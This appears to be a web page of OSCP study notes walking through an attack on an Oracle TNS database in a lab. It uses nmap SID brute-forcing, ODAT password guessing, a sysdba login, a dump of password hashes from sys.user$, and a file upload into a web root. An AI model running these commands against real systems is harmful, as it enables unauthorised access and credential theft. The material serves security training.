<!doctype html><html lang=en-us dir=ltr itemscope itemtype=http://schema.org/Article data-r-output-format=html><head><meta charset=utf-8><meta name=viewport content="height=device-height,width=device-width,initial-scale=1,minimum-scale=1"><meta name=generator content="Hugo 0.131.0"><meta name=generator content="Relearn 8.2.0"><meta name=description content="Privileges Depending on the user’s privileges, we may be able to perform different actions within a SQL Server, such as:
Read or change the contents of a database
Read or change the server configuration
Execute commands
Read local files
Communicate with other databases
Capture the local system hash
Impersonate existing users
Gain access to other networks
In this section, we will explore some of these attacks.
sudo nmap -p1521 -sV 10."><meta name=author content><meta name=twitter:card content="summary"><meta name=twitter:title content="oracle databases TNS :: DrakonOps"><meta name=twitter:description content="Privileges Depending on the user’s privileges, we may be able to perform different actions within a SQL Server, such as:
Read or change the contents of a database
Read or change the server configuration
Execute commands
Read local files
Communicate with other databases
Capture the local system hash
Impersonate existing users
Gain access to other networks
In this section, we will explore some of these attacks.
sudo nmap -p1521 -sV 10."><meta property="og:url" content="https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/oracle-databases-tns/index.html"><meta property="og:site_name" content="DrakonOps"><meta property="og:title" content="oracle databases TNS :: DrakonOps"><meta property="og:description" content="Privileges Depending on the user’s privileges, we may be able to perform different actions within a SQL Server, such as:
Read or change the contents of a database
Read or change the server configuration
Execute commands
Read local files
Communicate with other databases
Capture the local system hash
Impersonate existing users
Gain access to other networks
In this section, we will explore some of these attacks.
sudo nmap -p1521 -sV 10."><meta property="og:locale" content="en_us"><meta property="og:type" content="article"><meta property="article:section" content="OSCP Notes"><meta itemprop=name content="oracle databases TNS :: DrakonOps"><meta itemprop=description content="Privileges Depending on the user’s privileges, we may be able to perform different actions within a SQL Server, such as:
Read or change the contents of a database
Read or change the server configuration
Execute commands
Read local files
Communicate with other databases
Capture the local system hash
Impersonate existing users
Gain access to other networks
In this section, we will explore some of these attacks.
sudo nmap -p1521 -sV 10."><meta itemprop=wordCount content="801"><title>oracle databases TNS :: DrakonOps</title>
<link href=https://irfan123456789-hub.github.io/DrakonOps/images/logo.png?1762045611 rel=icon type=image/png><link href=https://irfan123456789-hub.github.io/DrakonOps/DrakonOps/css/auto-complete/auto-complete.min.css?1762045611 rel=stylesheet><script src=https://irfan123456789-hub.github.io/DrakonOps/DrakonOps/js/auto-complete/auto-complete.min.js?1762045611 defer></script><script src=https://irfan123456789-hub.github.io/DrakonOps/DrakonOps/js/search-lunr.min.js?1762045611 defer></script><script src=https://irfan123456789-hub.github.io/DrakonOps/DrakonOps/js/search.min.js?1762045611 defer></script><script>window.relearn=window.relearn||{},window.relearn.index_js_url="https://irfan123456789-hub.github.io/DrakonOps/searchindex.en.js?1762045611"</script><script src=https://irfan123456789-hub.github.io/DrakonOps/DrakonOps/js/lunr/lunr.min.js?1762045611 defer></script><script src=https://irfan123456789-hub.github.io/DrakonOps/DrakonOps/js/lunr/lunr.stemmer.support.min.js?1762045611 defer></script><script src=https://irfan123456789-hub.github.io/DrakonOps/DrakonOps/js/lunr/lunr.multi.min.js?1762045611 defer></script><script src=https://irfan123456789-hub.github.io/DrakonOps/DrakonOps/js/lunr/lunr.en.min.js?1762045611 defer></script><script>window.relearn=window.relearn||{},window.relearn.contentLangs=["en"]</script><link href=https://irfan123456789-hub.github.io/DrakonOps/DrakonOps/fonts/fontawesome/css/fontawesome-all.min.css?1762045611 rel=stylesheet media=print onload='this.media="all",this.onload=null'><noscript><link href=https://irfan123456789-hub.github.io/DrakonOps/DrakonOps/fonts/fontawesome/css/fontawesome-all.min.css?1762045611 rel=stylesheet></noscript><link href=https://irfan123456789-hub.github.io/DrakonOps/DrakonOps/css/perfect-scrollbar/perfect-scrollbar.min.css?1762045611 rel=stylesheet><link href=https://irfan123456789-hub.github.io/DrakonOps/css/theme.min.css?1762045611 rel=stylesheet><link href=https://irfan123456789-hub.github.io/DrakonOps/css/format-html.min.css?1762045611 rel=stylesheet id=R-format-style><script>window.relearn=window.relearn||{},window.relearn.min=`.min`,window.relearn.path="/oscp-notes/oracle-databases-tns/index.html",window.relearn.relBasePath="../..",window.relearn.relBaseUri="../..",window.relearn.absBaseUri="https://irfan123456789-hub.github.io/DrakonOps",window.relearn.disableAnchorCopy=!1,window.relearn.disableAnchorScrolling=!1,window.relearn.disableInlineCopyToClipboard=!1,window.relearn.enableBlockCodeWrap=!0,window.relearn.getItem=(e,t)=>e.getItem(t),window.relearn.setItem=(e,t,n)=>e.setItem(t,n),window.relearn.removeItem=(e,t)=>e.removeItem(t),window.T_Copy_to_clipboard=`Copy to clipboard`,window.T_Copied_to_clipboard=`Copied to clipboard!`,window.T_Copy_link_to_clipboard=`Copy link to clipboard`,window.T_Link_copied_to_clipboard=`Copied link to clipboard!`,window.T_Reset_view=`Reset view`,window.T_View_reset=`View reset!`,window.T_No_results_found=`No results found for "{0}"`,window.T_N_results_found=`{1} results found for "{0}"`,window.relearn.themevariants=["zen-dark"],window.relearn.customvariantname="my-custom-variant",window.relearn.changeVariant=function(e){var t=document.documentElement.dataset.rThemeVariant;window.relearn.setItem(window.localStorage,window.relearn.absBaseUri+"/variant",e),document.documentElement.dataset.rThemeVariant=e,t!=e&&(document.dispatchEvent(new CustomEvent("themeVariantLoaded",{detail:{variant:e,oldVariant:t}})),window.relearn.markVariant())},window.relearn.markVariant=function(){var e=window.relearn.getItem(window.localStorage,window.relearn.absBaseUri+"/variant");document.querySelectorAll(".R-variantswitcher select").forEach(t=>{t.value=e})},window.relearn.initVariant=function(){var e=window.relearn.getItem(window.localStorage,window.relearn.absBaseUri+"/variant")??"";e==window.relearn.customvariantname||(!e||!window.relearn.themevariants.includes(e))&&(e=window.relearn.themevariants[0],window.relearn.setItem(window.localStorage,window.relearn.absBaseUri+"/variant",e)),document.documentElement.dataset.rThemeVariant=e},window.relearn.initVariant(),window.relearn.markVariant()</script><link href=https://irfan123456789-hub.github.io/DrakonOps/DrakonOps/css/custom.css?1762045611 rel=stylesheet></head><body class="mobile-support html" data-url=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/oracle-databases-tns/index.html><div id=R-body class=default-animation><div id=R-body-overlay></div><nav id=R-topbar><div class=topbar-wrapper><div class=topbar-sidebar-divider></div><div class="topbar-area topbar-area-start" data-area=start><div class="topbar-button topbar-button-sidebar" data-content-empty=disable data-width-s=show data-width-m=hide data-width-l=hide><span class="btn cstyle link noborder notitle interactive"><button onclick=toggleNav() type=button title="Menu (CTRL+ALT+n)"><i class="fa-fw fas fa-bars"></i></button></span></div><div class="topbar-button topbar-button-toc" data-content-empty=hide data-width-s=show data-width-m=show data-width-l=show><span class="btn cstyle link noborder notitle interactive"><button onclick=toggleTopbarFlyout(this) type=button title="Table of Contents (CTRL+ALT+t)"><i class="fa-fw fas fa-list-alt"></i></button></span><div class=topbar-content><div class=topbar-content-wrapper></div></div></div></div><ol class="topbar-breadcrumbs breadcrumbs highlightable" itemscope itemtype=http://schema.org/BreadcrumbList><li itemscope itemtype=https://schema.org/ListItem itemprop=itemListElement><a itemprop=item href=https://irfan123456789-hub.github.io/DrakonOps/index.html><span itemprop=name>DrakonOps</span></a><meta itemprop=position content="1">&nbsp;>&nbsp;</li><li itemscope itemtype=https://schema.org/ListItem itemprop=itemListElement><a itemprop=item href=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/index.html><span itemprop=name>OSCP Notes</span></a><meta itemprop=position content="2">&nbsp;>&nbsp;</li><li itemscope itemtype=https://schema.org/ListItem itemprop=itemListElement><span itemprop=name>oracle databases TNS</span><meta itemprop=position content="3"></li></ol><div class="topbar-area topbar-area-end" data-area=end><div class="topbar-button topbar-button-prev" data-content-empty=disable data-width-s=show data-width-m=show data-width-l=show><span class="btn cstyle link noborder notitle interactive"><a href=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/mssql/index.html title="mssql (🡐)"><i class="fa-fw fas fa-chevron-left"></i></a></span></div><div class="topbar-button topbar-button-next" data-content-empty=disable data-width-s=show data-width-m=show data-width-l=show><span class="btn cstyle link noborder notitle interactive"><a href=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/ipmi/index.html title="IPMI (🡒)"><i class="fa-fw fas fa-chevron-right"></i></a></span></div><div class="topbar-button topbar-button-more" data-content-empty=hide data-width-s=show data-width-m=show data-width-l=show><span class="btn cstyle link noborder notitle interactive"><button onclick=toggleTopbarFlyout(this) type=button title=More><i class="fa-fw fas fa-ellipsis-v"></i></button></span><div class=topbar-content><div class=topbar-content-wrapper><div class="topbar-area topbar-area-more" data-area=more></div></div></div></div></div></div></nav><div id=R-main-overlay></div><main id=R-body-inner class="highlightable oscp-notes" tabindex=-1><div class=flex-block-wrapper><article class=default><header class=headline></header><h1 id=oracle-databases-tns>oracle databases TNS</h1><h4 id=privileges>Privileges</h4><p>Depending on the user&rsquo;s privileges, we may be able to perform different actions within a SQL Server, such as:</p><ul><li><p>Read or change the contents of a database</p></li><li><p>Read or change the server configuration</p></li><li><p>Execute commands</p></li><li><p>Read local files</p></li><li><p>Communicate with other databases</p></li><li><p>Capture the local system hash</p></li><li><p>Impersonate existing users</p></li><li><p>Gain access to other networks</p></li></ul><p>In this section, we will explore some of these attacks.</p><div class="highlight wrap-code" dir=auto><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-shell-session data-lang=shell-session><span style=display:flex><span>sudo nmap -p1521 -sV 10.129.204.235 --open
</span></span></code></pre></div><p>find sid</p><div class="highlight wrap-code" dir=auto><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-shell-session data-lang=shell-session><span style=display:flex><span>cube111@local[/local]$ sudo nmap -p1521 -sV 10.129.204.235 --open --script oracle-sid-brute
</span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010></span>Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-06 11:01 EST
</span></span><span style=display:flex><span>Nmap scan report for 10.129.204.235
</span></span><span style=display:flex><span>Host is up (0.0044s latency).
</span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010></span>PORT     STATE SERVICE    VERSION
</span></span><span style=display:flex><span>1521/tcp open  oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
</span></span><span style=display:flex><span>| oracle-sid-brute: 
</span></span><span style=display:flex><span>|_  XE
</span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010></span>Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
</span></span><span style=display:flex><span>Nmap done: 1 IP address (1 host up) scanned in 55.40 seconds
</span></span></code></pre></div><p> brute force</p><div class="highlight wrap-code" dir=auto><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-shell-session data-lang=shell-session><span style=display:flex><span>cube111@local[/local]$ ./odat.py all -s 10.129.204.235
</span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010></span>[+] Checking if target 10.129.204.235:1521 is well configured for a connection...
</span></span><span style=display:flex><span>[+] According to a test, the TNS listener 10.129.204.235:1521 is well configured. Continue...
</span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010></span>...SNIP...
</span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010></span>[!] Notice: &#39;mdsys&#39; account is locked, so skipping this username for password           #####################| ETA:  00:01:16 
</span></span><span style=display:flex><span>[!] Notice: &#39;oracle_ocm&#39; account is locked, so skipping this username for password       #####################| ETA:  00:01:05 
</span></span><span style=display:flex><span>[!] Notice: &#39;outln&#39; account is locked, so skipping this username for password           #####################| ETA:  00:00:59
</span></span><span style=display:flex><span>[+] Valid credentials found: scott/tiger. Continue...
</span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010></span>...SNIP...
</span></span></code></pre></div><p> </p><p> </p><div class="highlight wrap-code" dir=auto><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-shell-session data-lang=shell-session><span style=display:flex><span>cube111@local[/local]$ ./odat.py -h
</span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010></span>usage: odat.py [-h] [--version]
</span></span><span style=display:flex><span>               {all,tnscmd,tnspoison,sidguesser,snguesser,passwordguesser,utlhttp,httpuritype,utltcp,ctxsys,externaltable,dbmsxslprocessor,dbmsadvisor,utlfile,dbmsscheduler,java,passwordstealer,oradbg,dbmslob,stealremotepwds,userlikepwd,smb,privesc,cve,search,unwrapper,clean}
</span></span><span style=display:flex><span>               ...
</span></span></code></pre></div><p> if sql plus error occurs</p><div class="highlight wrap-code" dir=auto><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-shell-session data-lang=shell-session><span style=display:flex><span>cube111@local[/local]$ sudo sh -c &#34;echo /usr/lib/oracle/12.2/client64/lib &gt; /etc/ld.so.conf.d/oracle-instantclient.conf&#34;;sudo ldconfig
</span></span></code></pre></div><p> </p><div class="highlight wrap-code" dir=auto><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-shell-session data-lang=shell-session><span style=display:flex><span>cube111@local[/local]$ sqlplus scott/tiger@10.129.204.235/XE
</span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010></span>SQL*Plus: Release 21.0.0.0.0 - Production on Mon Mar 6 11:19:21 2023
</span></span><span style=display:flex><span>Version 21.4.0.0.0
</span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010></span>Copyright (c) 1982, 2021, Oracle. All rights reserved.
</span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010></span>ERROR:
</span></span><span style=display:flex><span>ORA-28002: the password will expire within 7 days
</span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010></span>Connected to:
</span></span><span style=display:flex><span>Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
</span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010></span>SQL&gt;
</span></span></code></pre></div><p> </p><div class="highlight wrap-code" dir=auto><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-shell-session data-lang=shell-session><span style=display:flex><span>SQL&gt; select table_name from all_tables;
</span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010></span>TABLE_NAME
</span></span><span style=display:flex><span>------------------------------
</span></span><span style=display:flex><span>DUAL
</span></span><span style=display:flex><span>SYSTEM_PRIVILEGE_MAP
</span></span><span style=display:flex><span>TABLE_PRIVILEGE_MAP
</span></span><span style=display:flex><span>STMT_AUDIT_OPTION_MAP
</span></span><span style=display:flex><span>AUDIT_ACTIONS
</span></span><span style=display:flex><span>WRR$_REPLAY_CALL_FILTER
</span></span><span style=display:flex><span>HS_BULKLOAD_VIEW_OBJ
</span></span><span style=display:flex><span>HS$_PARALLEL_METADATA
</span></span><span style=display:flex><span>HS_PARTITION_COL_NAME
</span></span><span style=display:flex><span>HS_PARTITION_COL_TYPE
</span></span><span style=display:flex><span>HELP
</span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010></span>...SNIP...
</span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010></span>SQL&gt; select * from user_role_privs;
</span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010></span>USERNAME                       GRANTED_ROLE                   ADM DEF OS_
</span></span><span style=display:flex><span>------------------------------ ------------------------------ --- --- ---
</span></span><span style=display:flex><span>SCOTT                          CONNECT                        NO  YES NO
</span></span><span style=display:flex><span>SCOTT                          RESOURCE                       NO  YES NO
</span></span></code></pre></div><div class="highlight wrap-code" dir=auto><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-shell-session data-lang=shell-session><span style=display:flex><span>select table_name from all_tables;
</span></span></code></pre></div><p> </p><p>LOGIN aas admin</p><p> </p><div class="highlight wrap-code" dir=auto><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-shell-session data-lang=shell-session><span style=display:flex><span>cube111@local[/local]$ sqlplus scott/tiger@10.129.204.235/XE as sysdba
</span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010></span>SQL*Plus: Release 21.0.0.0.0 - Production on Mon Mar 6 11:32:58 2023
</span></span><span style=display:flex><span>Version 21.4.0.0.0
</span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010></span>Copyright (c) 1982, 2021, Oracle. All rights reserved.
</span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010></span>Connected to:
</span></span><span style=display:flex><span>Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
</span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010></span>SQL&gt; select * from user_role_privs;
</span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010></span>USERNAME                       GRANTED_ROLE                   ADM DEF OS_
</span></span><span style=display:flex><span>------------------------------ ------------------------------ --- --- ---
</span></span><span style=display:flex><span>SYS                            ADM_PARALLEL_EXECUTE_TASK      YES YES NO
</span></span><span style=display:flex><span>SYS                            APEX_ADMINISTRATOR_ROLE        YES YES NO
</span></span><span style=display:flex><span>SYS                            AQ_ADMINISTRATOR_ROLE          YES YES NO
</span></span><span style=display:flex><span>SYS                            AQ_USER_ROLE                   YES YES NO
</span></span><span style=display:flex><span>SYS                            AUTHENTICATEDUSER              YES YES NO
</span></span><span style=display:flex><span>SYS                            CONNECT                        YES YES NO
</span></span><span style=display:flex><span>SYS                            CTXAPP                         YES YES NO
</span></span><span style=display:flex><span>SYS                            DATAPUMP_EXP_FULL_DATABASE     YES YES NO
</span></span><span style=display:flex><span>SYS                            DATAPUMP_IMP_FULL_DATABASE     YES YES NO
</span></span><span style=display:flex><span>SYS                            DBA                            YES YES NO
</span></span><span style=display:flex><span>SYS                            DBFS_ROLE                      YES YES NO
</span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010></span>USERNAME                       GRANTED_ROLE                   ADM DEF OS_
</span></span><span style=display:flex><span>------------------------------ ------------------------------ --- --- ---
</span></span><span style=display:flex><span>SYS                            DELETE_CATALOG_ROLE            YES YES NO
</span></span><span style=display:flex><span>SYS                            EXECUTE_CATALOG_ROLE           YES YES NO
</span></span><span style=display:flex><span>...SNIP...
</span></span></code></pre></div><p> </p><div class="highlight wrap-code" dir=auto><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-shell-session data-lang=shell-session><span style=display:flex><span>SQL&gt; select name, password from sys.user$;
</span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010></span>NAME                           PASSWORD
</span></span><span style=display:flex><span>------------------------------ ------------------------------
</span></span><span style=display:flex><span>SYS                            FBA343E7D6C8BC9D
</span></span><span style=display:flex><span>PUBLIC
</span></span><span style=display:flex><span>CONNECT
</span></span><span style=display:flex><span>RESOURCE
</span></span><span style=display:flex><span>DBA
</span></span><span style=display:flex><span>SYSTEM                         B5073FE1DE351687
</span></span><span style=display:flex><span>SELECT_CATALOG_ROLE
</span></span><span style=display:flex><span>EXECUTE_CATALOG_ROLE
</span></span><span style=display:flex><span>DELETE_CATALOG_ROLE
</span></span><span style=display:flex><span>OUTLN                          4A3BA55E08595C81
</span></span><span style=display:flex><span>EXP_FULL_DATABASE
</span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010></span>NAME                           PASSWORD
</span></span><span style=display:flex><span>------------------------------ ------------------------------
</span></span><span style=display:flex><span>IMP_FULL_DATABASE
</span></span><span style=display:flex><span>LOGSTDBY_ADMINISTRATOR
</span></span><span style=display:flex><span>...SNIP...
</span></span></code></pre></div><p> </p><p> </p><p>FILE UPLOADS</p><p> </p><table><thead><tr><th><strong>OS</strong></th><th><strong>Path</strong></th></tr></thead><tbody><tr><td>Linux</td><td><code>/var/www/html</code></td></tr><tr><td>Windows</td><td><code>C:\inetpub\wwwroot</code></td></tr></tbody></table><p> </p><div class="highlight wrap-code" dir=auto><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-shell-session data-lang=shell-session><span style=display:flex><span>cube111@local[/local]$ echo &#34;Oracle File Upload Test&#34; &gt; testing.txt
</span></span><span style=display:flex><span>cube111@local[/local]$ ./odat.py utlfile -s 10.129.204.235 -d XE -U scott -P tiger --sysdba --putFile C:\\inetpub\\wwwroot testing.txt ./testing.txt
</span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010></span>[1] (10.129.204.235:1521): Put the ./testing.txt local file in the C:\\inetpub\\wwwroot folder like testing.txt on the 10.129.204.235 server                                                                                                  
</span></span><span style=display:flex><span>[+] The ./testing.txt file was created on the C:\\inetpub\\wwwroot directory on the 10.129.204.235 server like the testing.txt file
</span></span></code></pre></div><p> </p><p>Finally, we can test if the file upload approach worked with <code>curl</code>. Therefore, we will use a <code>GET http://&lt;IP></code> request, or we can visit via browser.</p><p>Oracle TNS</p><div class="highlight wrap-code" dir=auto><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-shell-session data-lang=shell-session><span style=display:flex><span>cube111@local[/local]$ curl -X GET http://10.129.204.235/testing.txt
</span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010></span>Oracle File Upload Test
</span></span></code></pre></div><p> </p><p> </p><p> </p><p> </p><h4 id=gui-application>GUI Application</h4><p>Database engines commonly have their own GUI application. MySQL has <a href=https://dev.mysql.com/downloads/workbench/ rel=external>MySQL Workbench</a> and MSSQL has <a href=https://docs.microsoft.com/en-us/sql/ssms/download-sql-server-management-studio-ssms rel=external>SQL Server Management Studio or SSMS</a>, we can install those tools in our attack host and connect to the database. SSMS is only supported in Windows. An alternative is to use community tools such as <a href=https://github.com/dbeaver/dbeaver rel=external>dbeaver</a>. <a href=https://github.com/dbeaver/dbeaver rel=external>dbeaver</a> is a multi-platform database tool for Linux, macOS, and Windows that supports connecting to multiple database engines such as MSSQL, MySQL, PostgreSQL, among others, making it easy for us, as an attacker, to interact with common database servers.</p><p>To install <a href=https://github.com/dbeaver/dbeaver rel=external>dbeaver</a> using a Debian package we can download the release .deb package from <a href=https://github.com/dbeaver/dbeaver/releases rel=external>https://github.com/dbeaver/dbeaver/releases</a> and execute the following command:</p><h4 id=install-dbeaver>Install dbeaver</h4><div class="highlight wrap-code" dir=auto><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-shell-session data-lang=shell-session><span style=display:flex><span>[!bash!]$ sudo dpkg -i dbeaver-&lt;version&gt;.deb
</span></span></code></pre></div><p>To start the application use:</p><h4 id=run-dbeaver>Run dbeaver</h4><div class="highlight wrap-code" dir=auto><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-shell-session data-lang=shell-session><span style=display:flex><span>[!bash!]$ dbeaver &amp;
</span></span></code></pre></div><p>To connect to a database, we will need a set of credentials, the target IP and port number of the database, and the database engine we are trying to connect to (MySQL, MSSQL, or another).</p><h4 id=video---connecting-to-mssql-db-using-dbeaver>Video - Connecting to MSSQL DB using dbeaver</h4><p>Click on the image below for a short video demonstration of connecting to an MSSQL database using <code>dbeaver</code>.</p><p><a href=#R-image-ad4534ac46826aff6aec1b0600b948f2 class=lightbox-link><img alt=MSSQL class="lazy lightbox figure-image" loading=lazy src=https://irfan123456789-hub.github.io/DrakonOps/resources/ConnectToMSSQL-1.jpg style=height:auto;width:auto></a>
<a href=javascript:history.back(); class=lightbox-back id=R-image-ad4534ac46826aff6aec1b0600b948f2><img alt=MSSQL class="lazy lightbox lightbox-image" loading=lazy src=https://irfan123456789-hub.github.io/DrakonOps/resources/ConnectToMSSQL-1.jpg></a></p><footer class=footline></footer></article></div></main></div><aside id=R-sidebar class=default-animation><div id=R-header-topbar class=default-animation></div><div id=R-header-wrapper class=default-animation><div id=R-header class=default-animation><a id=R-logo class=R-default href=https://irfan123456789-hub.github.io/DrakonOps/><div class=logo-title style=display:flex;align-items:center><img src=https://irfan123456789-hub.github.io/DrakonOps/images/logo.png alt=Logo style=width:90px;height:80>
<span>DrakonOps</span></div></a></div><search><form action=https://irfan123456789-hub.github.io/DrakonOps/search/index.html method=get><div class="searchbox default-animation"><button class=search-detail type=submit title="Search (CTRL+ALT+f)"><i class="fas fa-search"></i></button>
<label class=a11y-only for=R-search-by>Search</label>
<input data-search-input id=R-search-by name=search-by class=search-by type=search placeholder=Search...>
<button class=search-clear type=button data-search-clear title="Clear search"><i class="fas fa-times" title="Clear search"></i></button></div></form></search></div><div id=R-homelinks class="default-animation homelinks"><div class="R-menu-divider default-animation"><hr class=padding></div><div class="R-sidebarmenu R-shortcutmenu-homelinks"><ul class="space collapsible-menu"><li data-nav-url=https://irfan123456789-hub.github.io/DrakonOps/index.html><a class=padding href=https://irfan123456789-hub.github.io/DrakonOps/index.html><i class="fa-fw fas fa-home"></i> Home</a></li></ul></div><div class="R-menu-divider default-animation"><hr class=padding></div><div class="R-sidebarmenu R-shortcutmenu-headercontrols"><ul></ul></div><div class="R-menu-divider default-animation"><hr class=padding></div></div><div id=R-content-wrapper class=highlightable><div class="R-sidebarmenu R-shortcutmenu-main"><ul class="enlarge morespace collapsible-menu"><li class=parent data-nav-url=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/index.html><input type=checkbox id=R-section-5f51e3ac21bcc264f305c28eac7484ea aria-controls=R-subsections-5f51e3ac21bcc264f305c28eac7484ea checked><label for=R-section-5f51e3ac21bcc264f305c28eac7484ea><i class="fa-fw fas fa-chevron-right"></i><span class=a11y-only>Submenu OSCP Notes</span></label><a class=padding href=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/index.html>OSCP Notes<i class="fa-fw fas fa-check read-icon"></i></a><ul id=R-subsections-5f51e3ac21bcc264f305c28eac7484ea class=collapsible-menu><li data-nav-url=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/main-methodology/index.html><a class=padding href=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/main-methodology/index.html>main methodology<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/methodology/index.html><a class=padding href=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/methodology/index.html>methodology<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/project/index.html><a class=padding href=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/project/index.html>project<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/footprinting-and-finger-printing-web-apps/index.html><a class=padding href=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/footprinting-and-finger-printing-web-apps/index.html>footprinting and finger printing web apps<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/nmap/index.html><a class=padding href=https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/nmap/index.html>nmap<i class="fa-fw fas fa-check read-icon"></i></a></li><li 